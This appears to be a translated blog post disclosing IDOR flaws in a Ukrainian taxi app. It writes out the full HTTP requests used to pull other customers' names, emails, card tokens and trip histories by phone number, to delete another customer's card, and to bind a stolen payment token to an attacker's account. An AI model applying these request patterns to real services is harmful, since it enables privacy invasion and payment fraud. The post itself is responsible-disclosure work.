Comment prendre un taxi aux frais de quelqu'un d'autre - vulnérabilités sur l'exemple d'un service

Après avoir trouvé des vulnérabilités dans les services bancaires mobiles d'une banque ukrainienne ( poste ), j'ai voulu changer un peu de direction et passer des services financiers à d'autres.

Un article publicitaire sur l'application de taxi mobile mise à jour a attiré mon attention et je l'ai choisie comme expérimentale.

Ici, les outils sont les mêmes: PC, Fiddler, Android-smartphone - installez l'application et suivez ses demandes.

En particulier, je n'ai pas pris en compte les demandes et les réponses lors de l'inscription ou de la connexion (par exemple, je n'ai pas vérifié la possibilité d'un mot de passe par force brute), mais je suis passé aux fonctions disponibles après l'inscription.

Étant donné que je n'avais pas d'historique de voyage avec ce service et que je ne voulais pas effectuer un véritable voyage pour les tests, j'avais besoin de données de l'un des autres clients. J'ai décidé de demander à des amis un compte dans le service. Parmi les connaissances, il y avait des clients de ce taxi, mais ils l'ont appelé à l'ancienne - à l'aide d'un appel.

Ensuite, j'ai commencé à chercher des numéros de téléphone parmi les informations accessibles au public sur Internet - par exemple, sur le site officiel et parmi les avis sur les réseaux sociaux (les clients souvent insatisfaits, décrivant les plaintes, les laissent dans les commentaires pour consultation publique au lieu d'envoyer l'entreprise à leur PM personnel ). En conséquence, j'ai trouvé quelques téléphones sur l'un des sites de recherche d'emploi. J'ai substitué l'un d'eux dans les demandes suivantes et j'ai reçu des informations qui n'auraient pas dû être accessibles à quiconque de l'extérieur.



Ce sont les problèmes suivants:

1. Nous obtenons l'identifiant du client, son nom, son téléphone, son e-mail et sa ville (le taxi fonctionne dans plusieurs villes).

Lorsque l'application charge le profil, la demande POST suivante est exécutée:

https://sometaxi/mobile3/templateAll.php?PHPSESSID=4cmdlokh4luo209d88kv6uh7 Content-Type: application/x-www-form-urlencoded charset: utf-8 User-Agent: User Host: sometaxi Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 37 func=loadMyInfo&phone=%2B380671234567 

En remplaçant le numéro de téléphone de quelqu'un d'autre dans la fonction loadMyInfo&phone , en réponse, j'ai reçu l'ID du client, son nom complet, son téléphone, son e-mail et sa ville:

 [{"id":14014,"varFirstName":" ","varLastName":"","varSurName":" ","varTel":"+380671234567","varTel2":"","varEmail":"Sergey_ivan@some.mail","city":1,"cityName":""}] 

2) Informations sur les cartes de paiement des clients

Dans la deuxième demande, j'ai pu obtenir des informations sur les cartes de paiement ajoutées par le client à mon compte personnel:

 https://sometaxi/mobile3/ClientCard.php?PHPSESSID=4cmdlokh4luo209d88kv6uh7 HTTP/1.1 Content-Type: application/x-www-form-urlencoded charset: utf-8 User-Agent: User Host: sometaxi Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 58 data={"Task":"GetClientCardsData","phone":"+380671234567"} 

La réponse est:

 {"data":[{"masked_card":"512345XXXXXX6789","rectoken":"ccaffe873a0e88caf49bc65bbef2390329","card_type":"MASTERCARD","default":true,"card_name":""}]} 

Ici étaient disponibles: un numéro de carte tronqué, une sorte de jeton, le type de carte, si la carte est installée par défaut et son nom.

3) Obtenir des informations sur les voyages du client

La troisième demande - loadHistory - m'a probablement fourni la quantité d'informations la plus importante et la plus importante (comme je le pensais alors):

 https://sometaxi/mobile3/templateAll.php?PHPSESSID=4cmdlokh4luo209d88kv6uh7 HTTP/1.1 Content-Type: application/x-www-form-urlencoded charset: utf-8 User-Agent: User Host: sometaxi Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 38 func=loadHistory&phone=%2B380671234567 

Une partie de la réponse (comme précédemment, les données ont changé) :

 {"id":454875,"From":"- ., 1","To":"і ., 13","When":"10-01-2019 15:55","WhenDate":1569942900,"Price":"160","Rate":0,"preorder":0,"status":1,"orderid":"11174445","additionalServices":"[]","classAvto":2,"callsignid":6426,"Car":"  ,Toyota Corolla,, 3733 ","city":1,"cityName":"ї","distance":"0.00"} {"id":408880,"From":"  ., 2","To":"- ., 1","When":"25-12-2018 03:44","WhenDate":1545709440,"Price":"79","Rate":0,"preorder":0,"status":1,"orderid":"10966503","additionalServices":"[]","classAvto":2,"callsignid":4545,"Car":"  ,Toyota Corolla,, 0415 ","city":null,"cityName":null,"distance":"0.00"} 

Voici les informations disponibles: adresse de départ, adresse de destination, date et heure du voyage, coût, ainsi que nom complet du chauffeur de taxi, type, couleur et numéro de sa voiture.

Total: avec quelques demandes, par numéro de téléphone, vous pouvez tout savoir sur le client de ce service, y compris certains détails de sa vie personnelle (par exemple, un voyage pour le Nouvel An à 2 heures du matin d'une adresse à une autre).

Il y avait sûrement d'autres endroits dans la demande où d'autres informations pouvaient être obtenues. Mais il a déjà été trouvé suffisamment pour informer les développeurs à ce sujet, ce que j'ai fait immédiatement pour diriger les adresses de travail.

Nous avons correspondu pendant un mois et plus tard, ils m'ont payé des frais.

---

Et puis ce message pourrait se terminer, mais j'ai décidé de vérifier à nouveau si toutes les erreurs ont été corrigées.

Oui, deux des trois demandes ne me donnaient plus les informations des autres, mais une était toujours valide.

Les cartes de paiement sont ajoutées à cette application de la même manière que les autres: tout d'abord, sur une page spéciale, le client indique le numéro complet, la date d'expiration et les cartes CVV. Vient ensuite la vérification en radiant 1 UAH. et confirmation par le client d'une telle opération à l'aide de 3-D Secure / LookUp. C'est une pratique normale, le numéro complet et les autres détails de paiement des cartes client ne figuraient pas dans les demandes.

Mais depuis que j'ai vu que ma carte ajoutée est supprimée par une demande du formulaire data={"Task":"DeleteClientCardsData", "rectoken":"bc65bbef2390329ccaffe873a0e88caf49" } , j'ai décidé de vérifier: que se passera-t-il si je spécifie le rectoken d'un autre client.

4) Retirer la carte de quelqu'un d'autre par jeton

J'exécute la demande avec un autre jeton:

 https://sometaxi/mobile3/ClientCard.php?PHPSESSID=5n4tim74asve7uefdf3hvd6c3 HTTP/1.1 Content-Type: application/x-www-form-urlencoded charset: utf-8 User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-G925F) Host: sometaxi Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 86 data={"Task":"DeleteClientCardsData","rectoken":"ccaffe873a0e88caf49bc65bbef2390329"} 

Et la carte extraterrestre a disparu!

J'ai également vérifié cela avec la même requête # 2 - était-ce juste une réponse visuelle {"status":"Success"."err":""} , ou la carte a-t-elle été vraiment supprimée du client.

La carte a en effet été supprimée.

Immédiatement, j'ai écrit une deuxième lettre, m'excusant, mais j'ai décidé d'expérimenter davantage en me créant un autre compte: si la carte peut être supprimée par le jeton - peut-être peut-elle être liée par le même jeton, et elle peut être liée à elle-même?

5) Ajouter la carte de quelqu'un d'autre par jeton à votre compte

Oui, je ne languirai pas - la carte de quelqu'un d'autre pourrait être liée à elle-même. L'essentiel est de connaître rectoken (et vous pouvez l'obtenir grâce au problème ouvert # 2).

Dans la demande POST, il était possible de spécifier toutes les données - les 6 premiers et les 4 derniers chiffres du numéro de carte, au moins 500000 **** 1111 - la carte était visuellement associée à ces données, et le jeton provenait d'un autre client et était valide.

 POST https://sometaxi/mobile3/ClientCard.php?PHPSESSID=5n4tim74asve7uefdf3hvd6c3 HTTP/1.1 Content-Type: application/x-www-form-urlencoded charset: utf-8 User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-G925F) Host: sometaxi Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 221 data={"Task":"ClientCardData","default":false,"phone":"+380991234567","masked_card":"500000XXXXXX1111","card_name":"Test","card_type":"MASTERCARD","rectoken":"4f6d228517f2d45690670aba78013a0408"} 

Qu'est-ce que cela signifie: en raison de la possibilité de lier le jeton à mon compte, je pourrais faire un voyage aux frais de quelqu'un d'autre sans connaître tous les détails de la carte et sans aucune vérification supplémentaire - après tout, la carte a déjà été ajoutée par le client et a été vérifiée avec succès par le service de paiement.

Explication de la possibilité de payer avec la carte de quelqu'un d'autre:
Pour simplifier la saisie des détails de paiement pour les paiements, un paiement en un clic basé sur des jetons est utilisé. Lors du premier achat, le client saisit les données de paiement, avec les paiements ultérieurs au client, il suffit de cliquer sur le bouton "payer".

Un jeton est un numéro unique attribué à un ensemble de paramètres de carte dans le système. Ce jeton peut être utilisé pour le paiement direct sans entrer CVV et sans authentification 3-D Secure.


Radiation par token - opération de débit / blocage de fonds sur la carte, sans la participation du client, en transférant le token du commerçant.

Un exemple d'explication est tiré d'ici .

Les développeurs ont demandé de démontrer la possibilité de transférer le jeton de leur compte vers le mien et de commander un taxi - ils devaient s'assurer que la déduction du jeton se produirait vraiment. Bien sûr, la commande a été passée, l’argent a été débité ( je ne suis pas monté dans la voiture ). Plus tard, ils m'ont payé un peu plus d'argent.

---

Comme vous pouvez le voir dans cet article et dans les articles précédents, parfois PHPSESSID, Authorization ou SecurityToken ne suffit pas.

Si vous êtes développeur, veuillez suivre ce que vous donnez lorsque vous le demandez. Si vous êtes un testeur, recherchez et trouvez, mais assurez-vous d'en informer les développeurs. Les vulnérabilités sont pleines ici et là, alors soyez un hacker blanc.